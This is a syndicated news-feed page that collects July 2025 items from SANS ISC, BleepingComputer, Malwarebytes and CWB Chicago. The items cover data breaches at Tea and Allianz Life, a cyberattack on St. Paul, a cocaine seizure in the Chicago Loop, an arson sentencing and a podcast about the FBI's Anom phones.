CVE-2025-7425: Processing a file may lead to memory corruption.
Affects libxml2
x   x     x x x

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
BleepingComputer ([syndicated profile] bleeping_computer_feed) wrote2025-07-29 02:58 pm

Minnesota activates National Guard after St. Paul cyberattack

Posted by Sergiu Gatlan

Minnesota Governor Tim Walz has activated the National Guard in response to a crippling cyberattack that struck the City of Saint Paul, the state's capital, on Friday. [...]
Malwarebytes ([syndicated profile] malwarebytesblog_feed) wrote2025-07-29 06:13 pm

Tea Dating Advice app has users’ private messages disclosed

A few days after Tea Dating Advice discovered unauthorized access to one of its systems that leaked 72,000 user images, the popular mobile app faced a second issue involving a separate database, as a researcher reported to 404Media that they were able to access private conversations.

Tea Dating Advice, or just Tea for short, aims to provide a space for women to exchange information about men they know, have met, or dated in the past. The app seeks to provide a platform for people to share relevant information about, say, potentially abusive partners, and it claims to have more than 1.6 million users. After approving a new user, the system allows them to search for men by name, find people they know, and leave comments about them. Theoretically, men can’t access the app, so they have no recourse if they’re drowning in red flags and warnings on Tea.

The set of leaked images includes 13,000 selfies and photo IDs submitted for account verification including driver license photos, as well as 59,000 images from posts, comments, and direct messages.

While Tea acknowledged that a data breach occurred on a legacy data storage system, resulting in unauthorized access to a dataset from prior to February 2024, this is a completely different breach, and even worse for those involved. The researcher was able to see over a million private messages, stretching from early 2023 up until last week.

Kasra Rahjerdi, the researcher who flagged the issue, provided a database of more than 1.1 million messages to prove his findings. With the content of these messages at hand, it was trivial to find social media profiles, telephone numbers, and the real-world identities of most users.

They found messages from women discussing abortions, cheating partners, and other sensitive info.

One internet forum, 4chan, openly shared the images exposed in the first breach, but Rahjerdi informed only Tea and 404Media about his latest work, providing enough information to confirm their findings. But there is no way of knowing whether others used the same method to access Tea’s private messages.

Aside from how you might feel about the Tea app, its purpose, the users, and those intent on destroying it, the developers could have anticipated the scrutiny and attacks on their infrastructure. Leaks happen everywhere, but sensitive data should not be stored unencrypted. And, while Tea claims to donate 10% of it profits to the National Domestic Violence Hotline, the company still has a responsibility of safety (through cybersecurity) to its own users.

A Tea app spokesperson limited their statement to:

“We have engaged third-party cybersecurity experts and are working around the clock to secure our systems. At this time, we have implemented additional security measures and have fixed the data issue.”

Tea Dating Advice users will have to be vigilant since phishing attacks banking on these incidents might occur.

Protecting yourself after a data breach

While there are no indications that this database was found by cybercriminals before it was secured, it might have been. There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

  • Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened and follow any specific advice they offer.
  • Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
  • Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
  • Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims and verify the identity of anyone who contacts you using a different communication channel.
  • Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
  • Consider not storing your card details. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
  • Set up identity monitoring. Identity monitoring alerts you if your personal information is found being traded illegally online and helps you recover after.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

BleepingComputer ([syndicated profile] bleeping_computer_feed) wrote2025-07-29 01:51 pm
Malwarebytes ([syndicated profile] malwarebytesblog_feed) wrote2025-07-29 05:24 pm

Allianz Life says majority of 1.4 million US customers’ info breached

Insurance company Allianz Life was breached, exposing the data of most of its 1.4 million American customers.

According to Allianz, an attacker gained access to a third-party, cloud-based Customer Relationship Management (CRM) system through social engineering. The company filed a data breach notification with the Attorney General of the US state of Maine on Friday July 25, 2025.

The incident reportedly took place on July 16, 2025 and was discovered one day later. According to a spokesperson:

“The threat actor was able to obtain personally identifiable data related to the majority of Allianz Life’s customers, financial professionals, and select Allianz Life employees, using a social engineering technique.”

Although the company did not disclose an exact number of affected people, the Allianz Life has 1.4 million customers in the US. Its parent company, Allianz, has more than 125 million customers worldwide.

Allianz Life did not disclose the exact CRM system involved. However, in June, Google warned about a ransomware group that was specializing in voice phishing (vishing) campaigns that are specifically designed to compromise organizations’ Salesforce instances for large-scale data theft and extortion.

Google tracks this group as UNC6040, which the cybersecurity community commonly calls “The Com.” The group called Scattered Spider likely is the most well-known entity associated with The Com. Earlier this month we reported that Scattered Spider breached Australia’s largest airline Qantas by gaining access to a third-party platform, utilizing social engineering.

If Scattered Spider was indeed behind the Allianz data breach, they will extort the company by threatening to release the acquired data or sell it to the highest bidder.

The data breach notification indicates that Allianz plans to start informing affected consumers as of August 1, 2025.

Protecting yourself after a data breach

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

  • Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened and follow any specific advice they offer.
  • Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
  • Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
  • Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims and verify the identity of anyone who contacts you using a different communication channel.
  • Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
  • Consider not storing your card details. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
  • Set up identity monitoring. Identity monitoring alerts you if your personal information is found being traded illegally online and helps you recover after.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

CWB Chicago ([syndicated profile] cwb_feed) wrote2025-07-29 06:17 pm

Guns, kilos of cocaine, and $400,000 cash seized from Loop apartment, feds say

Posted by Tim Hecke

A Chicago man has been charged in federal court after Drug Enforcement Administration agents seized cocaine, guns, and hundreds of thousands of dollars in cash from his Loop apartment and SUV during a 2022 surveillance operation. The newly filed criminal complaint does not reveal why authorities waited three years before charging the man.

On June 8, 2022, DEA agents conducting surveillance watched David Watson leave his downtown apartment building in the 100 block of North Garland Court and ride off in a maroon Jeep Cherokee driven by an unidentified woman, the complaint states. The SUV returned about 40 minutes later and parked next to a Porsche registered to Watson.

Both Watson and the woman were seen carrying weighted bags into the building, the complaint said. Later that afternoon, Watson allegedly returned alone to the Jeep, loaded items into the rear seat and cargo area, and drove off.

Agents stopped him shortly afterward and said he gave them permission to search the SUV. Inside, they allegedly found a kilo of cocaine, about $85,550 in bundled cash, and another 45 grams of powder cocaine in the center console.

Watson also consented to a search of his apartment, where investigators found “several more kilograms of cocaine, multiple firearms, and $400,000 in U.S. currency,” the complaint said.

Watson allegedly told agents he was planning to deliver the money and drugs to a courier connected to a Mexican source near 33rd and Damen. But a dispute with the source led him to back out of the deal, the complaint states.

He is charged with possession with intent to distribute 500 grams or more of cocaine.

Original reporting you’ll see nowhere else, paid for by our readers. Click here to support our work.

The post Guns, kilos of cocaine, and $400,000 cash seized from Loop apartment, feds say appeared first on CWB Chicago.

CWB Chicago ([syndicated profile] cwb_feed) wrote2025-07-29 05:43 pm

Arsonist gets 6 years for setting Halloween decorations ablaze on North Side

Posted by Tim Hecke

Mario Munoz, inset, and a surveillance image of the arson suspect. (Ring; Chicago Police Department)

A Logan Square man suspected of setting fire to Halloween decorations across Roscoe Village and nearby neighborhoods in October 2023 has been sentenced to seven years in prison after pleading guilty to arson and battering a police officer.

Mario Munoz, 34, pleaded guilty Tuesday to aggravated arson in exchange for a six-year sentence from Judge Aleksandra Gillespie. She added a consecutive one-year term for an unrelated case in which Munoz admitted to battering a peace officer, court records show.

Around 3:43 a.m. on October 11, 2023, Munoz allegedly torched a hay bale on a porch in the 2200 block of West Roscoe, scorching the floor and a column. The homeowner managed to put out the fire before it spread further.

Police said surveillance footage captured images of the suspect, and a break in the case came days later when a Roscoe Village resident spotted Munoz near Addison and Hoyne and called 911. Officers stopped Munoz, captured images of him on their body cameras, and later compared those with video of the arsonist. He was arrested later that day.

In addition to the fire he pleaded guilty to setting, Munoz was accused of decapitating inflatable Halloween figures outside a home in the 4100 block of North Maplewood. That incident was also caught on camera:

At the time, Ald. Matt Martin (47th) warned constituents that Munoz was a suspect in a broader pattern of at least eight arsons involving Halloween decorations placed outside homes. Police believed several other incidents—including a house fire on the 3600 block of North Hoyne that began when someone lit a decorative hay bale on fire —were likely connected. However, he was never charged with any of the other fires.

The post Arsonist gets 6 years for setting Halloween decorations ablaze on North Side appeared first on CWB Chicago.

BleepingComputer ([syndicated profile] bleeping_computer_feed) wrote2025-07-29 12:10 pm

Hackers exploit SAP NetWeaver bug to deploy Linux Auto-Color malware

Posted by Bill Toulas

Hackers were spotted exploiting a critical SAP NetWeaver vulnerability tracked as CVE-2025-31324 to deploy the Auto-Color Linux malware in a cyberattack on a U.S.-based chemicals company. [...]
Malwarebytes ([syndicated profile] malwarebytesblog_feed) wrote2025-07-29 03:38 pm

How the FBI got everything it wanted (re-air) (Lock and Code S06E15)

This week on the Lock and Code podcast…

For decades, digital rights activists, technologists, and cybersecurity experts have worried about what would happen if the US government secretly broke into people’s encrypted communications.

The weird thing, though, is that, in 2018, it already happened. Sort of.

US intelligence agencies, including the FBI and NSA, have long sought what is called a “backdoor” into the secure and private messages that are traded through platforms like WhatsApp, Signal, and Apple’s Messages. These applications all provide what is called “end-to-end encryption,” and while the technology guarantees confidentiality for journalists, human rights activists, political dissidents, and everyday people across the world, it also, according to the US government, provides cover for criminals.

But to access any single criminal or criminal suspect’s encrypted messages would require an entire reworking of the technology itself, opening up not just one person’s communications to surveillance, but everyone’s. This longstanding struggle is commonly referred to as The Crypto Wars, and it dates back to the 1950s during the Cold War, when the US government created export control regulations to protect encryption technology from reaching outside countries.

But several years ago, the high stakes in these Crypto Wars became somewhat theoretical, as the FBI gained access to the communications and whereabouts of hundreds of suspected criminals, and they did it without “breaking” any encryption whatsover.

It all happened with the help of Anom, a budding company behind an allegedly “secure” phone that promised users a bevy of secretive technological features, like end-to-end encrypted messaging, remote data wiping, secure storage vaults, and even voice scrambling. But, unbeknownst to Anom’s users, the entire company was a front for law enforcement. On Anom phones, every message, every photo, every piece of incriminating evidence, and every order to kill someone, was collected and delivered, in full view, to the FBI.

Today, on the Lock and Code podcast with host David Ruiz, we revisit a 2024 interview with 404 Media cofounder and investigative reporter Joseph Cox about the wild, true story of Anom. How did it work, was it “legal,” where did the FBI learn to run a tech startup, and why, amidst decades of debate, are some people ignoring the one real-life example of global forces successfully installing a backdoor into a company?

The public…and law enforcement, as well, [have] had to speculate about what a backdoor in a tech product would actually look like. Well, here’s the answer. This is literally what happens when there is a backdoor, and I find it crazy that not more people are paying attention to it.

Tune in today to listen to the full conversation.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)


Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium for Lock and Code listeners.